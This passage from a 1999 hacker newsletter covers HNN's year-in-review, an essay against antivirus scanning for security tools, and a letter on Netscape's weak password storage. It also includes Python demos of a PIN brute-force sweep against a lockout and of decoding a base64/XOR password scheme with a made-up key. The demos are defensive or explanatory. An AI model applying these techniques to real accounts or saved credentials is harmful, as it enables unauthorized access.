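        if expected is not None and hmac.compare_digest(expected.encode(),
                                                        pin.encode()):
            self._state.pop(pagoo_id, None)
            return "ok"
        failures += 1
        if failures >= self.max_failures:
            self._state[pagoo_id] = (0, now + self.lock_seconds)
        else:
            self._state[pagoo_id] = (failures, 0)
        return "invalid"

def run_sweep(gate, pagoo_id):
    """Replay the 0000..9999 walk, one guess per second, against the gate.

    Returns (guesses the gate actually evaluated, PIN found or None).
    """
    evaluated = 0
    for i in range(10000):
        result = gate.check(pagoo_id, f"{i:04d}", now=i)
        if result == "ok":
            return evaluated + 1, f"{i:04d}"
        if result == "invalid":
            evaluated += 1
    return evaluated, None

if __name__ == "__main__":
    print("IDs under sweep:", find_pin_sweeps(sample_log()))
    print("sweep vs lockout:", run_sweep(PinGate({"5550001": "7319"}), "5550001"))
```

      With the lockout the replayed walk gets only a small fraction of its
      guesses evaluated, but a PIN that falls within the first five guesses is
      still found, so the lockout belongs alongside alerting and a larger secret.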
       
       
      @HWA
      
11.0 HNN: The Year in Review 1999
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     From HNN http://www.hackernews.com/
     
     Note: Check the url for relative links included in the text. - Ed


     Nineteen Ninety Nine was an exciting year that saw
     explosive growth for HNN and our ever continuing battle
     against Fear, Uncertainty, and Doubt (FUD). While some
     of our engagements with FUD have been successful, like
     the alleged moving of a British satellite, other battles like
     the numerous virus scares, were not. 1999 also saw some
     major events unfold in the underground community, from
     the exposure of Se7en as a fraud, to the removal and
     resurrection of Packet Storm Security, and the debacle of
     MTV. At the close of the year Kevin Mitnick is awaiting
     release while others take his place behind bars.
     Throughout 1999 HNN was the place on the net to get up
     to date breaking news on these stories. 

     These top eleven stories of 1999 are not presented in any
     particular order. 

     LoU China-Iraq War
     On December 29, 1998 the underground group Legions of
     the Underground declared an all out cyber warfare on
     information infrastructure of China and Iraq. They cited
     severe civil rights abuses by the governments of both
     countries as well as the sentencing to death of two bank
     robbers in China and the production of weapons of mass
     destruction by Iraq as the reasons for their declaration. 

     By January 5th, 1999 a group known as spl0it and a group
     based in Poland said that they would assist LoU in their cyber
     warfare efforts. 

     On January 6th, 1999 Legions of the Underground released
     a statement contradicting their earlier statements that
     claimed that they never had destructive intentions and
     blamed the media for letting this get out of hand. 

     The retraction by LoU came too late. On the next day
     January 7th, 1999 an International Hacker Coalition
     including groups such as cDc, L0pht, CCC, 2600, Phrack,
     !HISPAHACK and others released a joint statement
     condemning the Legions of the Underground and their
     Declaration of War. 

     By January 8, 1999 LoU was reeling from the overwhelming
     support of the joint condemnation of LoU's actions and
     released additional retractions of their declaration of war. 

     On January 13, 1999 the Legions of the Underground told
     Wired magazine that the original press conference was a
     fake and that the people present during the press
     conference were spoofed. There is no evidence to support
     this but there is none to deny it either. 

     Finally Optiklenz, a member of LoU, releases a statement
     on the view of what happened from the LoU perspective. 

     LoU-China-Iraq War Histogram - Chronological Listing of
     Events
     HNN Archive for December 29, 1998
     Transcript of IRC Press Conference with LoU
     LoU Declaration of War
     HNN Archive for January 6, 1999
     International Hacker Coalition Joint Statement
     LoU Retraction of War Declaration
     Optiklenz Statement





     Hackers Move British Military Satellite 
     This is one battle with FUD that we like to claim that we
     won. On March 1, 1999 The Sunday Business published a
     story that was later picked up by the Reuters wire
     service, that a British military satellite had been taken
     over by cyber attackers and was being held for ransom.
     The story itself lacked any sort of verifiable information
     and HNN called it into question immediately. By the next
     day spokespeople from the British Ministry of Defense flat
     out denied that such a thing was even possible. HNN
     editor Space Rogue was a guest on the radio show "Off
     the Hook" to discuss this incident. Both ZDNet and MSNBC
     ran stories covering this non event crediting HNN for
     calling the story suspect. Bob Sullivan of MSNBC went so
     far as to label HNN "The Voice of Reason". 

     HNN Archive for March 01, 1999
     HNN Archive for March 02, 1999
     Original Sunday Business Article
     Security Analysis of Satellite Command and Control Uplinks
     - Buffer Overflow Article by Brian Oblivion
     MSNBC
     ZD Net
     Off The Hook - March 02, 1999 episode 




     Se7en Exposed 
     An article written by Steve Silberman and published by
     Wired exposed Se7en (Christian Valor) and his single
     handed cracker crusade against pedophiles as a complete
     sham. Se7en succeeded in creating a massive media hack as
     articles of his infamous exploits were published in Forbes,
     MSNBC, LA Times, Newsday and others over several
     months. Only one of the journalists that we know, Adam
     Penenberg, that had been duped by Se7en actually
     admitted his mistake and published a public apology. 

     HNN Archive for February 8, 1999
     Attrition.org - Evidence used against Se7en
     Wired
     Open letter from Adam Penenberg    
     

     John Vranesevich Shuts Down Packet Storm Security 
     Probably the biggest story of 1999 was the actions of
     John Vranesevich, founder and administrator of AntiOnline,
     who was instrumental in getting the extremely popular
     web site Packet Storm Security shut down. 

     As far as can be determined John Vranesevich discovered
     a private directory on Packet Storm that contained
     potentially libelous material about him and his family. Mr.
     Vranesevich did not contact the site administrator directly
     but instead sent an email to the administrators at Harvard
     University asking that the objectionable material be
     removed. Harvard responded by unceremoniously pulling
     the plug on the whole site. 

     Once word spread of how and why Packet Storm had gone down,
     a public outcry ensued. Mailing lists were started, people
     started an attempt to mirror the site, Ken Williams
     received numerous offers to host the site and Mr.
     Vranesevich became the whipping boy du jour. 

     Because Mr. Williams was unable to access his web site,
     which was his senior project, he was forced to drop out of
     school. He later sold the web site to Kroll O' Gara and took
     a position at a major internet security company. 

     HNN Archive for July 1, 1999
     HNN Archive for July 2, 1999
     Attrition.org - Examples of the supposedly libelous
     materials posted to Packet Storm
     Ken Williams Statement
     AntiOnline - John Vranesevich's Defense
     Letter from Harvard
     Ken Williams Response to Harvard
     Letter From Bronc Buster - Regarding the actions of Mr.
     Vranesevich
     ZD Net 




     HNN Pulls Massive April Fools Joke 
     It was meant as a simple joke, a simple April Fools Day
     prank, a reason to smile or to laugh. It turned into one of
     the biggest stories in the underground for 1999. At
     midnight EST on April 1, 1999 the main Hacker News web
     page was updated with what appeared as a web
     defacement. The page contained all the required elements
     of a defacement, poor spelling, hax0r speak, shout outs,
     etc... Many, many, bought the defacement hook, line and
     sinker; HNN administrators even got personal phone calls
     to their homes at 8am to inform them of the defacement.
     Remember, even as recently as April web defacements
     were a relatively rare thing, not occurring by the dozens
     like they are today. Ahhhh, but the fun did not stop there.
     At Noon EST the HNN pranksters felt the unsuspecting
     public needed even more mayhem and hijinks. The defaced
     page came down and the day's news went up. The news
     contained stories such as Kevin Mitnick breaking out of jail
     by whistling a 300 baud carrier into a phone, L0pht Heavy
     Industries selling L0phtCrack for $1.2 billion to NAI, CERT
     going out of Business, and Microsoft buying Network
     Solutions for complete control of the Internet. Considering
     the volume of mail we received regarding these stories
     (some of which came from mainstream journalists) many
     many people believed them. 

     Archive of HNN Defacement
     HNN Archive for April 1, 1999




     PhoneMasters
     For some reason the mainstream media has really not paid
     attention to this story. Considering the level to which
     these crimes escalated and the methods and effort
     needed to catch these crooks it is a wonder that
     there wasn't more media coverage. 

     The FBI called them the 'Phone Masters' and labeled their
     crimes as one of the greatest cyber-intrusions of all time.
     Court records show that the Phone Masters had gained
     access to telephone networks of companies including
     AT&T Corp., British Telecommunications Inc., GTE Corp.,
     MCI WorldCom (then MCI Communications Corp.),
     Southwestern Bell, and Sprint Corp. They broke into
     credit-reporting databases belonging to Equifax Inc. and
     TRW Inc. They entered Nexis/Lexis databases and
     systems of Dun & Bradstreet. They could eavesdrop on
     phone calls, compromise secure databases, redirect
     communications, they also had access to portions of the
     national power grid, and air-traffic-control systems. 

     The FBI had to invent special equipment they called a
     'data tap' specifically for this case and get special
     permission from DOJ to use it. It took several years of
     listening to phone calls to gather enough evidence for an
     arrest but on February 22, 1995 the FBI conducted a raid
     on three suspected members of the PhoneMasters. Other
     members of the group are thought to remain at large.
     Three members of the group pleaded guilty to federal
     charges of one count of theft and possession of
     unauthorized calling-card numbers and one count of
     unauthorized access to computer systems. The three
     were sentenced in October to 24 to 41 months in federal
     prison. 

     What bothers us most about this story is that almost no
     mainstream media has reported on the story. The first
     mention we can find about the Phone Masters is from a
     local TV station, WFAA in Dallas-Fort Worth, back in the
     beginning of May. 

     Phone Master Hacks - Buffer Overflow Article
     HNN Archive October 4, 1999 - PhoneMasters Plead Guilty
     Wall Street Journal - one of the few articles about this
     case
     Union Tribune - Another rare article that has a little bit
     more info.
     CNN - Tries to answer why the media missed the boat
     Aviary Mag - Interview with An Acquaintance of the
     Phone Masters




     MTV
     Serena Altschul, host of MTV News and of a documentary
     style program known as 'True Life' wanted to do a show
     on 'hacking' and in particular a show about Kevin Mitnick.
     She was placed into contact with Emmanuel Goldstein of
     2600 Magazine who organized several interviews for her.
     He spent a lot of time and effort in getting good people
     for her to talk to and they shot several hours worth of
     film. 

     For one reason or another the Kevin Mitnick aspect of the
     show was cut out, so being a good sport Emmanuel
     directed Serena to the folks at L0pht Heavy Industries.
     The L0pht crew made time in their busy schedules to
     spend an entire day with Serena and her film crew
     explaining the finer points of what they do and explaining
     the difference between script kiddie defacements and true
     hacking. 

     Again for some reason, this angle for the show was not to
     MTV's liking so they struck out on their own looking for
     whatever it was they wanted. They found Shamrock, the
     host of the Internet TV show devoted to hacking known
     as Pseudo. 

     The result was a complete farce. Evidently Shamrock
     decided to take MTV for a ride and give them what they
     wanted, a story line straight out of the movie Hackers.
     The show did nothing to explain what hacking was all
     about and was far from a documentary. Needless to say
     many people are upset at MTV and others over this mess. 

     Letters from HNN Viewers
     Letter from Emmanuel Goldstein
     Letter from Shamrock      
     
     

     Defcon VII and BO2K 
     Defcon probably had the most mainstream media coverage
     of any hacker convention to date. With over 3000
     attendees and over 200 press representatives present it
     was definitely one of the biggest conventions ever. With
     the release of Back Orifice 2000 from the Cult of the Dead
     Cow the press was working at a fever pitch trying to
     cover the story even before the software was released. 

     HNN spent quite a few days inebriated in Las Vegas while
     we tried to cover the happenings at Defcon. Some of the
     highlights included the BO2K launch presentation,
     complete with thumping techno and strobe lights, the
     ejection of Carolyn Meinel from the conference floor, and
     the defacement of the Defcon.org web page. 

     When we returned we had over 1200 emails to answer and
     one pounding hangover. The media went nuts over the
     BO2K release, sparking debates on just what a virus is and
     what should be scanned. Network Associates claimed to
     be the first out of the gate with a patch for the program.
     Microsoft was even prompted to release a security
     bulletin. 

     Also at Defcon, Zero Knowledge released 1000 beta copies
     of Freedom, L0pht Heavy Industries introduced the
     revolutionary new security tool AntiSniff, Bruce Schneier
     announced that PPTPv2 'sucks less', and Security Wizards
     released their Capture the Flag Logs. 

     HNN Archive for July 9, 1999 - Press frenzy prior to con
     Defcon.org Defacement Mirror
     HNN Archive for July 13, 1999 - the Aftermath
     Defcon VII Review - Buffer Overflow Article
     The Back Orifice 2000 Controversy - Buffer Overflow
     Article
     How the Anti Virus Industry Works - Buffer Overflow
     Article
     AntiVirus scanning for potentially misused tools is a
     doomed security strategy. - Buffer Overflow Article 




     Kevin Mitnick
     Kevin Mitnick's road has been a long and bumpy one that
     has stretched for several years, 1999 was no different.
     One small bright thing is that Kevin is scheduled to be
     released, finally, sometime early in 2000. 

     In March the federal government succeeded in wearing
     Kevin down. He decided to plead guilty in the hopes to get
     his four year ordeal over with. Unfortunately he still had
     charges from the State of California to deal with.
     HNN Archive for March 29, 1999

     On April 26th it was revealed that the companies
     supposedly hurt by theft of software by Kevin Mitnick
     never reported those millions of dollars in losses to the
     SEC as required by law.
     HNN Archive for April 25, 1999
     Letters from companies estimating the amount of
     damages.

     June 4th was supposed to be the day in which Kevin was
     officially sentenced and so demonstrations to support
     Kevin were planned at federal courthouses across the
     country. Unfortunately the hearing was postponed at the
     last minute but the demonstrations continued. Folks in
     other countries joined in by protesting outside embassies,
     the New York demonstration hired a skywriter to write
     FREE KEVIN over Central Park, the Philadelphia
     demonstration made it onto the local news and many online
     news agencies covered the San Francisco Demonstration,
     numerous other cities attempted to live web cast their
     demonstrations.
     HNN Archive for June 5, 1999
     Press Release -Demonstration Announcement
     Picture of the Russian Demonstration 

     On Kevin's fifth birthday behind bars the LA District
     Attorney graciously decided to drop the state charges
     against him. The DA claimed that the case had been
     mischarged.
     Finally on August 9th, after numerous delays, Kevin
     received his sentence of 46 months in prison with credit
     for time served. He will also be forced to pay $4125
     restitution to the supposed victims in the case. Instead of
     a halfway house as expected he was remanded to Lompoc
     Federal Prison.
     HNN Archive for August 9, 1999 

     Much more in depth information regarding Kevin Mitnick,
     his current status and the historical significance of this
     case can be found here.
     FREE KEVIN



     Virus Scares
     1999 was a banner year for viruses. Melissa, CIH, and
     numerous other viruses had the press working overtime.
     The virus writers keep churning them out, the antivirus
     companies keep detecting them and the press was not far
     behind. 

     Melissa seemed to be extremely virulent. By emailing 50
     copies of itself after every infection it made it around the
     globe very quickly. It managed to jump the air-gap onto
     the US government's SIPRNet and even made it on board ships
     in the Seventh Fleet. Numerous variants of Melissa
     surfaced with distributed DoS attack capability. Melissa
     was somehow traced through usenet to AOL and finally to
     David L. Smith who pleaded guilty to creating and
     releasing the virus. 

     HNN Archive for March 31, 1999 - Melissa makes it to 7th
     Fleet, Kills Marines Email, DoS Variant Appears
     HNN Archive for April 2, 1999 - David Smith arrested and
     released on $100,000 bail
     HNN Archive for April 5, 1999 - Melissa jumps air-gap onto
     classified SIPRNet
     HNN Archive for December 12, 1999 - David Smith pleads
     guilty. 

     CIH, while not as prolific as Melissa, was definitely more
     destructive. CIH or Chernobyl is triggered to release its
     payload on April 26th every year and it has been around
     for a while. It hit exceedingly hard this year, especially in
     the Far East. Its creator was traced back to Taiwan
     where he said he was sorry. 

     HNN Archive for April 27, 1999 - CIH strikes worldwide
     HNN Archive for April 29, 1999 - CIH Author Identified.
     HNN Archive for May 12, 1999 - China Estimates 360,000
     systems Damaged by CIH 

     The Virus Community Speaks
     How the Anti Virus Industry Works - Buffer Overflow
     Article
     AntiVirus scanning for potentially misused tools is a
     doomed security strategy. - Buffer Overflow Article 




     Ireland, Indonesia, China, Sweden, and Yugoslavia
     Government sanctioned cyber attacks seem to be all the
     rage these days. Some countries are openly announcing
     their plans to create offensive cyber warriors while others
     are claiming to have already suffered government
     sanctioned cyber attacks. 

     In January a small ISP in Ireland, Connect Ireland, that
     hosts the top level domain for East Timor claimed that it
     had suffered a massive attack by Indonesian government
     forces. Indonesia of course denied the charges.
     HNN Archive for January 26, 1999 

     Newsweek claimed that President Clinton authorized a
     "top-secret" plan against Slobodan Milosevic. One part of
     this plan would use "computer hackers" to attack his
     foreign bank accounts. Newsweek went on to say that
     the report instructed the CIA to wage "cyberwar" against
     Milosevic. 
     HNN Archive for May 24, 1999 HNN Archive for July 6,
     1999
     Yugoslavia Cut Off from the Net? - Buffer Overflow Article

     Sweden announced the formation of a cyber defense
     force.
     HNN Archive for July 14, 1999 

     Nobel Peace Prize laureate Jose Ramos-Horta claimed that
     hundreds of people around the world were poised to
     launch a cyber attack against Indonesia should there be
     any tampering in the election process for East Timor's
     freedom. No evidence was given for this cyber arsenal
     build up and no attack ever came. Connect Ireland, the
     ISP supposedly targeted by Indonesian forces earlier in
     the year, asked that no internet attacks be launched.
     HNN Archive for August 20, 1999
     Connect Ireland - response to Indonesian threats 

     A Chinese military newspaper covering the activities of
     China's People's Liberation Army has called for the
     recruitment of 'civilian hackers' and for the training of
     'cyber warriors' at Army schools. 
     HNN Archive for August 4, 1999 

     We hope that this disturbing trend does not continue into
     the next year. It will be an extremely bad day when the
     internet is legislated as a weapon of war.
     
     @HWA
     
12.0  AntiVirus scanning for potentially misused tools is a
      doomed security strategy. 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Weld Pond 
      The Anti-Virus vendors seem to be taking on a larger
      role. Not only are they scanning for true viruses and
      trojan horses but any software that may potentially be
      misused, as long as it is not their own software. This
      activity does nothing to close the holes in your network
      but instead gives you a false sense of security. 

      Buffer Overflow     
      http://www.hackernews.com/bufferoverflow/
      
      AntiVirus scanning for
      potentially misused tools is a
      doomed security strategy.
 
      By: Weld Pond, weld@l0pht.com
      L0pht Heavy Industries
      December 20, 1999 
 
      There is a growing trend with AntiVirus scanners today.
      The scanners are scanning for more and more software
      that does not contain virus or trojan code. The new
      category of software the scanners are looking for is
      common software that has the *potential* to be misused
      by malicious persons. Usually this software is in the
      security auditing tool, network monitoring, or remote
      control category. 
 
      Corporate customers of AntiVirus software have requested
      that these potentially misusable programs be flagged
      and, in some cases, "disinfected" by the scanning
      software. The AntiVirus vendors seem more than happy to
      comply, even going so far as to label this new category of
      detected software as a "virus" or "trojan" when found, no
      matter how misleading to the user this label is. 
 
      Another controversial twist in this new AntiVirus category
      is the fact that the AntiVirus vendors do not scan for their
      own tools that fall into the new "potentially misusable
      program" categories. Symantec's Norton AntiVirus will scan
      for the remote control programs, NetBus or BO2K, but not
      the company's own PC Anywhere. Network Associates'
      McAfee VirusScan will detect the NT password auditing
      tool, L0phtCrack, but will not detect the company's own
      vulnerability auditing tool, Cybercop scanner, or their
      network sniffers, Sniffer Basic or Sniffer Pro. 
 
      It is a fallacy that commercial tools are not misused by
      malicious individuals. They are usually available as free
      trial downloads or available on pirate software sites.
      However, the whole notion of protecting a network by
      scanning for potentially misusable tools is a fallacy unto
      itself! 
 
      Using AntiVirus client scanning technology to find
      programs that can exploit the security problems on a
      network is a losing battle. AntiVirus software can be
      turned off. New tools or new versions of older tools will
      soon become available. Other machines without AntiVirus
      software can be attached to the network. Machines can
      be booted with alternative OSes. 
 
      You need to actually fix the network security problems! It
      is foolhardy to scan for tools that could exploit problems
      rather than just fixing the problems. This scanning
      scenario just gets OS and application vendors off the
      hook. Now they don't have to fix the problems. They will
      just rely on the AV vendors to scan for programs or code
      that can exploit the problems. Why fix, for example, Win
      95/98 challenge-response network authentication? Each
      client on the network should be scanning for all known
      tools that can sniff the network or crack the passwords.
      Obviously this is not a good security model. 
 
      Scanning for potentially misused tools is leading network
      security down the path to the horrible situation we have
      with mobile code sent through email or through the web.
      The current industry accepted solution is not to solve the
      problem with a proper security architecture for hostile mail
      or web content, but instead to just scan for all *known*
      malicious mobile code. Ugh! The AntiVirus vendors have a
      vested interest in the status quo but this is not bringing
      the industry closer to a solution. To broaden this
      approach to cover network security problems is clearly
      heading in the wrong direction. 
 
      Can you imagine a day when a vendor responds to an
      intranet security vulnerability by saying, "This is not a
      problem with our product. We do, as always, recommend
      that all customers keep their AV software updated." It is
      time to start making networks or computers secure
      without relying on the approach of client code scanning. A
      false sense of security is worse than known poor security.
      If your network security cannot survive well known tools
      being installed and executed then you need to start
      addressing your problems, not sweeping them under the
      rug. 
 
 
 
      Weld Pond
      weld@l0pht.com 
      
      @HWA
      
13.0  RST Sets the Record Straight 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by John 
      Last week Reliable Software Technologies, Inc.,
      released a new advisory regarding the storage of email
      passwords by Netscape. They took a lot of flak from
      people, including HNN, who thought this was an old
      problem being rehashed by RST for cheap publicity. RST
      would like to take a moment to sort out the details and
      explain their new advisory and the old problem. 

      Letter from RST
      http://www.hackernews.com/special/1999/rst.html
      
      Reliable Software Technologies      
      http://www.rstcorp.com
      
      Date:        12/19/99 21:57
      Received:    12/19/99 22:04
      From:        John Viega, John@list.org
      To:          contact@hackernews.com

      Hey, 

      I believe that what HNN posted today about the Netscape
      thing is largely inaccurate. First, there are and have been
      two different ciphers in use in Netscape that are similar,
      but slightly different. The simpler one, which is a base 64
      and an xor only (with potentially a pad), apparently made
      the rounds a year ago, and people did note that it looked
      similar on recent versions of windows. But it isn't the same
      right now. Maybe Netscape changed their cipher from last
      year, or perhaps it has been the same through the whole
      4.0 series. I dunno, but at some point they did change it. 

      I looked at the 2.0 series, the 3.0 series, and 4.6 + 4.7 on
      Windows. The 4.6 and 4.7 cipher is substantially different
      from the 2/3 cipher. The 2/3 cipher is the same as current
      versions of Unix and Mac. Let's face it... user habits are
      different on Windows than on Unix. Few if any people use
      NS to read mail on a Mac. Plus, Windows has a lot more
      dumb users. 

      So we have definitely broken a different cipher. We didn't
      know that the older cipher was previously broken. When
      we talked to Netscape, they gave us no indication that it
      ever had been. In fact, they seemed to be indicating that
      they were crossing their fingers hoping that no one would
      target it. Also, the old attack wasn't very well publicized.
      Again, I suspect that NS knew about the old attack, was
      glad it stayed low key, and quietly made the algorithm a
      bit harder on its flagship Windows version without making
      a real effort to fix the problem. 

      The new cipher still does a base 64 encode and an XOR
      with a fixed key. However, it also does some bit
      permutations, and reads the bytes in reverse order. If you
      look at the same 7 char password encoded with the old
      algorithm and the new algorithm, you will notice that they
      aren't the same. You'll notice the "=" pad is at the front in
      the new kind, and comes last in the old kind. The strings
      will also look similar, but aren't the same thing reversed, or
      anything like that. 

      It wasn't that much stronger, but they obviously hoped it
      would provide a bit more security. Funny, the MSDN
      developer's network talks about security, mentions that
      XOR is desirable, and suggests tricks like this to help
      improve the security of XOR. It's completely and utterly
      ridiculous. 

      So, to summarize so far, the cipher is exactly as complex
      as we said it was, and not "simpler than first thought".
      There's been some unfortunate confusion between their
      old cipher and their new one. It definitely would have
      been nice if we'd run across info on the old one before we
      talked to Netscape, or if they'd have told us about it, but
      those things did not happen. 

      The next point I'd like to contend in today's HNN article is
      the quote "To Netscape's credit they are just conforming
      to the POP3 protocal which sends passwords in the clear
      anyway." First, the save password feature works w/ POP3
      and IMAP. IMAP doesn't require you to send passwords in
      plaintext. If I recall correctly, there are a bunch of
      different authentication mechanisms. Of course, I don't
      know what NS uses or does not use. Second, I don't
      believe that just because a password is going to be sent
      in plaintext, you should make it even easier for people to
      get at it. Even if you can't raise the bar high enough that
      someone won't be able to jump it, you should raise the bar
      as high as you can. Why didn't Netscape just leave the
      password lying around in plaintext? Well, even really poor
      obfuscation is going to stop most computer illiterates from
      getting the password. They'll find it if it's in plaintext
      (though someone might have to tell them it's there). At
      many companies, it'd be that much easier to get your
      boss' mail password, etc. just because he left himself
      logged in. 

      So basic obfuscation raises the bar a bit. But script
      kiddies can download software to decrypt the old
      passwords (we haven't seen anyone post such software
      for the new algorithm yet). Also, it's not too hard to
      embed code to collect such passwords in email
      attachments that show dancing pigs. In some older
      versions of Netscape, the password could be extracted
      remotely via JavaScript. For people who run both IE and
      Netscape, there is a current IE bug that will let people
      extract the ciphertext Netscape uses (Thanks to Richard
      Smith for that). More such holes might (probably) exist
      elsewhere. 

      I think that the more difficult you make this, the better,
      even if the password is sent over the network in plaintext.
      Why? Because it raises the bar a bit more. I believe that
      fewer people have the skills to set up a sniffer, and mine
      the data it produces than can run code to email back
      encrypted passwords, and then run code to decrypt them.
      Plus, there are tools like antisniff that can make it harder
      to sniff. Plus, you have to wait around for the person to
      actually check his mailbox from that machine (which he or
      she might not even use anymore). It's not a much bigger
      bar, true, but I believe it's a bit bigger nonetheless. 

      I've heard people argue that it is pointless for Netscape to
      use real encryption such as Twofish or 3DES and hide a
      key, because the key could be obtained through reverse
      engineering. Well, it's true that you could obtain the key
      that way. Again, I think it is a matter of raising the bar as
      high as you can. If you hide the key well, few people will
      be willing to go through the hassle of reverse engineering
      the code. Sure, it may eventually happen, but Netscape
      should hope that "eventually" at least buys them a little
      bit of time where they can really offer some security to
      people saving their passwords. There have been plenty of
      products that have gone several years with embedded
      keys that no one bothered to reverse engineer (at least,
      so far as the public knows). For most people, reverse
      engineering can be a huge time sink, and may not be
      worth the effort, especially when really good obfuscation
      is performed. There's generally always more interesting,
      lower hanging fruit to be picked. I know that I sure
      wouldn't have bothered to reverse engineer Netscape's
      algorithm if we couldn't break it by other means, and I
      believe a lot of other people feel the same way. 

      Another sentiment I have heard a bit in the past couple of
      days is, "If you need access to run code on the machine
      for this exploit, who cares, since you've already
      compromised the machine?" Well, the primary response to
      this is that mail account info is often a quick gateway to
      other accounts on other machines. POP3 and IMAP
      accounts often check the same password file telnetd
      checks. Or, wu-ftpd, which you could use in conjunction
      w/ a recent buffer overflow to get a shell. Also, plenty of
      people use the same passwords for multiple accounts, PGP
      passphrases, whatever. They shouldn't, but they do
      anyway. 

      John 
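
The letter's point that base 64 plus XOR with a fixed key is obfuscation rather than encryption, as an added example (not part of the letter and not Netscape's code). The key, the 3-bit rotation standing in for the "bit permutations", and the order of the steps are constructed assumptions that only mirror the structure the letter describes.

```python
import base64

# Constructed 16-byte key for illustration only. This is NOT Netscape's key.
FIXED_KEY = bytes(range(0x41, 0x51))


def xor_fixed(data: bytes, key: bytes = FIXED_KEY) -> bytes:
    """XOR every byte with a repeating fixed key (the step both schemes share)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def rotl3(b: int) -> int:
    """Hypothetical stand-in for the 'bit permutations': rotate a byte left by 3."""
    return ((b << 3) | (b >> 5)) & 0xFF


def rotr3(b: int) -> int:
    """Inverse of rotl3. A fixed permutation is undone without any secret."""
    return ((b >> 3) | (b << 5)) & 0xFF


def obfuscate_old(password: str) -> str:
    """Old-style scheme as described: XOR with a fixed key, then base 64."""
    return base64.b64encode(xor_fixed(password.encode())).decode()


def obfuscate_new(password: str) -> str:
    """New-style scheme as described: XOR, permute bits, base 64, reverse order."""
    mixed = bytes(rotl3(b) for b in xor_fixed(password.encode()))
    return base64.b64encode(mixed).decode()[::-1]


def recover_keystream(known_password: str, stored: str) -> bytes:
    """One known password and its stored form give back the key bytes used."""
    raw = base64.b64decode(stored)
    return bytes(c ^ p for c, p in zip(raw, known_password.encode()))


def decode_old_with_keystream(stored: str, keystream: bytes) -> str:
    """Decode any other old-style value using only the recovered keystream."""
    raw = base64.b64decode(stored)
    if len(raw) > len(keystream):
        raise ValueError("recovered keystream is shorter than the stored value")
    return bytes(c ^ k for c, k in zip(raw, keystream)).decode()


def deobfuscate_new(stored: str) -> str:
    """Every added layer is a fixed, invertible step, so it peels off in reverse."""
    raw = base64.b64decode(stored[::-1])
    return xor_fixed(bytes(rotr3(b) for b in raw)).decode()


if __name__ == "__main__":
    victim = "hunter2"                      # constructed 7-character sample
    old, new = obfuscate_old(victim), obfuscate_new(victim)
    print("old:", old)                      # pad characters come last
    print("new:", new)                      # pad characters come first
    print("new is old reversed?", new == old[::-1])

    # A user who saves a password of their own choosing learns the keystream.
    mine = "A" * 12
    ks = recover_keystream(mine, obfuscate_old(mine))
    print("old decoded:", decode_old_with_keystream(old, ks))
    print("new decoded:", deobfuscate_new(new))
```

The same password produces the same stored string on every installation, because nothing in either scheme depends on a per-user or per-machine secret.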
      
      @HWA
      
14.0  Russian Politician Threatens Cyber Attack 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by EvilWench 
      Russian politician, Vladimir Zhirinovsky, has threatened
      to electronically steal money from Western bank
      accounts. When asked what he would do to celebrate if
      he wins an upcoming parliamentary election the
      maverick politician announced that he would unleash
      computer viruses on the West and steal their money. 

      Reuters - via Excite      
      http://news.excite.com/news/r/991219/18/russia-election-zhirinovsky
      
      Jubilant Zhirinovsky wants to hack Western computers



                    
     MOSCOW (Reuters) - Russia's maverick politician Vladimir Zhirinovsky,
     whose ultra-nationalist bloc looks set to do well in a parliamentary 
     election, said Monday he would celebrate by hacking into Western computers.
 
     Zhirinovsky's bloc was running at more than eight percent in early results
     compared with pre-election opinion polls which had given him some five 
     percent. Asked by Reuters whether he would have a drink to mark his party's
     good showing, he said:
 
     "No. No way, we Russians don't drink any more. We now work on computers,
     we use computers to send viruses to the West and then we poach your
     money."
 
     "We have the best hackers in the world. We do not need to drink or smoke...
     we do not drink, smoke, have drugs and we don't have AIDS, that's what
     you have got in the West."
 
     Russia is a heavy drinking nation which is struggling to catch up with
     economically-advanced countries on the use of new technologies, such as
     the Internet, but a lack of resources and poor infrastructure confines 
     progress to big cities.
 
     Zhirinovsky who has run and done reasonably well in all parliamentary and
     presidential elections since 1991 on a protest vote by lower stratas of 
     the Russian society, is one of the most eccentric politicians with an acute
     political sense and bizarre sense of humour.
 
     He has thrown juice at an opponent in a live televised debate, promised to
     wash his boots in the Indian Ocean when Russia expands there and been 
     involved in fist-fighting in the State Duma lower chamber of parliament.
 
     But at the same time, he has decided crucial votes in parliament in the 
     Kremlin's favor and has developed a well organised party with solid assets. 
     
     @HWA
     
15.0  PCR-1000 Control Suite Released by Ghetto.org 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Javaman 
      After many hard hours of labor from Polywog and
      Javaman, Ghetto.org proudly releases its first
      mainstream product, the PCR-1000 Control Suite. The
      PCR-1000 is a wideband, PC-controlled receiver whose
      only decent control software was Win 9x/NT based.
      Because of Ghetto.org, there is now a *nix solution.
      Currently the code only compiles under Linux, they are
      seeking assistance in porting to other platforms. 

      Ghetto.org
      http://www.ghetto.org
      
      PCR-1000 Control Suite      
      http://www.ghetto.org/projects
      
      @HWA
      
16.0  Nuclear Power Plant Y2K Readiness 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by ZapfDing 
      A little paranoid about Y2K and whether that nuke plant
      down the street is ready? The Nuclear Regulatory
      Commission has released an interesting PDF file that lists
      the Y2K transition period for all the nuclear power plants
      in the world in relation to EST and UTC. 

      Nuclear Regulatory Commission and Y2K
      http://www.nrc.gov/NRC/NEWS/year2000.html
      
      Global Y2K Plant Listing - PDF       
      http://www.nrc.gov/IP/Y2K/yewstz.pdf
      
      @HWA
      
17.0  New E-zines Released 
      ~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by 1k Resistor and sony_103 
      Digital Defiance has done it again and come out with
      their second issue. They continue to run head strong
      with articles on house arrest devices as well as their
      feature of the month of HiCards free phone cards. The
      Venezuelan magazine Hven ezine issue #2 has also been
      released. Yes, it is in Spanish. 

      Digital Defiance
